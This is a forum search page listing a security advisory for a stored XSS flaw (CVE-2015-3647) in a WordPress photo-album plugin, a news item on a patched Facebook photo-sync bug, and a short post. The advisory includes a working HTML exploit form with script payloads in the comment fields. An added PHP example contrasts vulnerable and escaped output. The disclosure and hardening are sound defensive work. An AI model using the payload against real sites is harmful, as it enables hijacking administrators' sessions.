Search the Community

Showing results for tags 'album'.
Found 3 results

  1. Advisory ID: HTB23257
     Product: WP Photo Album Plus WordPress Plugin
     Vendor: J.N. Breetvelt
     Vulnerable Version(s): 6.1.2 and probably prior
     Tested Version: 6.1.2
     Advisory Publication: April 29, 2015 [without technical details]
     Vendor Notification: April 29, 2015
     Vendor Patch: April 29, 2015
     Public Disclosure: May 20, 2015
     Vulnerability Type: Cross-Site Scripting [CWE-79]
     CVE Reference: CVE-2015-3647
     Risk Level: Medium
     CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
     Solution Status: Fixed by Vendor
     Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

     -----------------------------------------------------------------------------------------------

     Advisory Details:

     High-Tech Bridge Security Research Lab discovered a stored XSS vulnerability in the WP Photo Album Plus WordPress plugin, which can be exploited to perform Cross-Site Scripting attacks against administrators of a vulnerable WordPress installation. An attacker might be able to hijack an administrator's session and obtain full control over the vulnerable website.

     The vulnerability exists due to the absence of filtration of user-supplied input passed via the "comname" and "comemail" HTTP POST parameters to the "/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" script when posting a comment. A remote attacker can post a specially crafted message containing malicious HTML or script code and execute it in the administrator's browser in the context of the vulnerable website, when the administrator views images or comments in the administrative interface.

     A simple exploit below will store JS code in the WP database and display a JS popup window with the "ImmuniWeb" word every time the administrator views comments or images:

     <form action="http://[host]/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" method="post" name="main">
       <input type="hidden" name="action" value='wppa'>
       <input type="hidden" name="wppa-action" value='do-comment'>
       <input type="hidden" name="photo-id" value='2'>
       <input type="hidden" name="comment" value='1'>
       <input type="hidden" name="moccur" value='1'>
       <input type="hidden" name="comemail" value='"><script>alert(/ImmuniWeb/);</script>'>
       <input type="hidden" name="comname" value='"><script>alert(/ImmuniWeb/);</script>'>
       <input type="submit" id="btn">
     </form>

     The code will be automatically executed when the administrator visits one of the following pages:

     http://[host]/wp-admin/admin.php?page=wppa_manage_comments
     http://[host]/wp-admin/admin.php?page=wppa_moderate_photos

     -----------------------------------------------------------------------------------------------

     Solution:

     Update to WP Photo Album Plus 6.1.3

     More Information:
     https://wordpress.org/plugins/wp-photo-album-plus/changelog/

     -----------------------------------------------------------------------------------------------

     References:

     [1] High-Tech Bridge Advisory HTB23257 - https://www.htbridge.com/advisory/HTB23257 - Stored Cross-Site Scripting (XSS) in WP Photo Album Plus WordPress Plugin.
     [2] WP Photo Album Plus WordPress plugin - https://wordpress.org/plugins/wp-photo-album-plus/ - This plugin is designed to easily manage and display your photos, photo albums, slideshows and videos in a single as well as in a network WP site.
     [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
     [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
     [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

     -----------------------------------------------------------------------------------------------

     Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

     Source: http://dl.packetstormsecurity.net/1505-exploits/wpphotoalbumplus612-xss.txt
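     The defensive counterpart to the advisory above, added here as an example (it is not the plugin's code and not part of the advisory or the forum post): a hypothetical comment handler showing the vulnerable pattern the advisory describes next to a hardened one. The example_ function names are assumptions; the field names "comname" and "comemail" come from the advisory; esc_html, sanitize_text_field, sanitize_email and wp_unslash are real WordPress helpers, with minimal stand-ins defined so the file also runs outside WordPress.

```php
<?php
// Added example, not code from the plugin, the advisory or the forum post.
// Mirrors the flow in HTB23257: two comment fields arrive via POST and are later
// rendered on an admin page. Field names are from the advisory; function names
// prefixed example_ are hypothetical.

// Minimal stand-ins so this file runs outside WordPress. Inside WordPress the real
// functions of the same name exist and the guards leave them untouched. The stand-ins
// only approximate WordPress behaviour.
if ( ! function_exists( 'wp_unslash' ) ) {
    function wp_unslash( $value ) { return stripslashes( $value ); }
}
if ( ! function_exists( 'sanitize_text_field' ) ) {
    function sanitize_text_field( $str ) {
        $str = strip_tags( $str );                            // drop tags
        $str = preg_replace( '/[\x00-\x1F\x7F]/', '', $str ); // drop control characters
        return trim( preg_replace( '/\s+/', ' ', $str ) );    // collapse whitespace
    }
}
if ( ! function_exists( 'sanitize_email' ) ) {
    function sanitize_email( $email ) {
        $email = filter_var( $email, FILTER_SANITIZE_EMAIL );
        return filter_var( $email, FILTER_VALIDATE_EMAIL ) ? $email : '';
    }
}
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
    }
}

// VULNERABLE pattern (what the advisory describes): stored verbatim, echoed verbatim.
function example_store_comment_vulnerable( array $post ) {
    return array( 'comname' => $post['comname'], 'comemail' => $post['comemail'] );
}
function example_render_comment_vulnerable( array $row ) {
    // Any markup in the stored row becomes live HTML in the administrator's browser.
    return '<tr><td>' . $row['comname'] . '</td><td>' . $row['comemail'] . '</td></tr>';
}

// HARDENED pattern: normalise on input, escape on output. Output escaping is the
// control that closes the XSS; input sanitisation limits what reaches the database.
function example_store_comment_hardened( array $post ) {
    $name  = sanitize_text_field( wp_unslash( isset( $post['comname'] ) ? $post['comname'] : '' ) );
    $email = sanitize_email( wp_unslash( isset( $post['comemail'] ) ? $post['comemail'] : '' ) );
    if ( $name === '' || $email === '' ) {
        return null; // reject rather than store an empty name or an invalid address
    }
    return array( 'comname' => $name, 'comemail' => $email );
}
function example_render_comment_hardened( array $row ) {
    // Escape at the point of output regardless of what was stored earlier.
    return '<tr><td>' . esc_html( $row['comname'] ) . '</td><td>' . esc_html( $row['comemail'] ) . '</td></tr>';
}

// Constructed request body with a marker tag in both fields.
$request = array(
    'comname'  => '"><script>alert(1)</script>',
    'comemail' => '"><script>alert(1)</script>',
);

echo 'vulnerable: ' . example_render_comment_vulnerable( example_store_comment_vulnerable( $request ) ) . "\n";

$safe = example_store_comment_hardened( $request );
echo 'hardened:   ' . ( $safe === null ? '(rejected: invalid e-mail)' : example_render_comment_hardened( $safe ) ) . "\n";

// A row that somehow still holds markup (older data, another write path) is neutralised on output.
$legacy = array( 'comname' => '<b>name</b>', 'comemail' => 'user@example.invalid' );
echo 'escaped:    ' . example_render_comment_hardened( $legacy ) . "\n";
```

     The third echo is the point to take away: escaping in the admin page template protects even records that were written before the input checks existed, which matters here because the advisory's payload is already sitting in the database of any site that was hit before updating to 6.1.3.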
  2. If you have enabled the automatic Facebook Photo Sync feature on your iPhone, iPad or Android devices, then beware! Hackers can steal your personal photographs without your knowledge.

     In 2012, the social network giant introduced the Facebook Photo Sync feature for iPhone, iPad and Android devices which, if opted in, allows Facebook to automatically sync all the photos saved on your mobile device with your Facebook account. The photos that you have synced from your phone are automatically uploaded in the background to a private Facebook album, which is not visible to any of your Facebook friends or other Facebook users. However, you may then choose to share photos from the album on your Facebook timeline or send them as a message to a friend.

     A bug bounty hunter, Laxman Muthiyah, discovered a critical flaw in the Facebook Photo Sync feature and Facebook API that could allow any third-party app to access your personal photos from the hidden Facebook Photo Sync album.

     It's something that reminds me of "The Fappenings" and "The Snappening" -- in which nude and personal photographs of top celebrities were leaked due to a security flaw in Apple's iCloud file storage service and an unofficial Snapchat messaging service app, respectively.

     In a blog post published today, Laxman explained that the vulnerability resides in the privilege mechanism that decides which applications are allowed to access synced photos using the vaultimages API. Technically, the synced private photo album should be accessible only by Facebook's official app, but the vulnerability allows any third-party app to get permission to read your personal synced photos.

     Laxman previously disclosed a vulnerability in the Facebook Graph API mechanism that allowed him to delete any photo album on Facebook owned by any user, any page or any group.

     HOW TO DISABLE AUTO-SYNC

     Though Facebook has patched the vulnerability reported by Laxman and rewarded him with $10,000 under its bug bounty program, Facebook users are advised to turn off the Facebook Photo Sync feature just to be on the safer side. In order to do so, just go to the Facebook mobile app menu, scroll down and select Account > App Settings > Sync Photos, then choose 'Don't sync my photos.'

     Source
  3. // remove pls, I mixed up the category..